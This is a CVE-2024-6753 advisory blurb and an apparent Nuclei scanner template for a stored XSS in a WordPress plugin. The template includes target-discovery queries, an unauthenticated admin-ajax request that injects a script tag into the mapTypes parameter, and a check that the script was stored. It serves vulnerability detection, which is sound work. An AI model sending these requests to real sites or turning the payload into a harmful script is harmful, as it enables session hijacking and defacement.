Social Auto Poster plugin for WordPress versions up to 5.3.14 contains a stored cross-site scripting caused by insufficient sanitization and escaping of 'mapTypes' parameter in the 'wpw_auto_poster_map_wordpress_post_type' AJAX function, letting unauthenticated attackers inject and execute arbitrary scripts when users access affected pages.
PoC代码[已公开]
id: CVE-2024-6753
info:
name: Social Auto Poster <= 5.3.14 - Stored Cross-Site Scripting
author: Shivam Kamboj
severity: high
description: |
Social Auto Poster plugin for WordPress versions up to 5.3.14 contains a stored cross-site scripting caused by insufficient sanitization and escaping of 'mapTypes' parameter in the 'wpw_auto_poster_map_wordpress_post_type' AJAX function, letting unauthenticated attackers inject and execute arbitrary scripts when users access affected pages.
impact: |
Attackers can execute arbitrary scripts in users' browsers, potentially leading to session hijacking, defacement, or redirection.
remediation: |
Update to the latest version of the plugin where the vulnerability is fixed.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/3c268a6d-dfb4-4a9d-802e-80e5c1c53ca2
- https://patchstack.com/database/vulnerability/social-auto-poster/wordpress-social-auto-poster-plugin-5-3-14-unauthenticated-stored-cross-site-scripting-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2024-6753
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2024-6753
cwe-id: CWE-79
epss-score: 0.07259
epss-percentile: 0.91351
metadata:
verified: true
max-request: 4
shodan-query: http.component:"WordPress"
fofa-query: body="social-auto-poster"
tags: cve,cve2024,wordpress,wp,wp-plugin,social-auto-poster,xss,vkev
flow: (http(1) && http(2)) || (http(3) && http(4))
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wpw_auto_poster_map_wordpress_post_type&mapTypes=xss_test:<script>alert(document.domain)</script>&postType=post
matchers:
- type: dsl
dsl:
- 'contains(body, "{\"status\":\"success\"}")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP+Cookie+check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(header, "wordpress_logged_in")'
condition: and
internal: true
- raw:
- |
GET /wp-admin/admin.php?page=wpw-auto-poster-settings HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "<script>alert(document.domain)</script>")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502206a5f27cc6d784bb8e29f5b0f332e0a848b1f592b5b20930a87eff8b4a03b51af022100b790910748376484dc3599fea6c197826d87afcf74decc1afea5194db538c11a:922c64590222798bb761d5b6d8e72950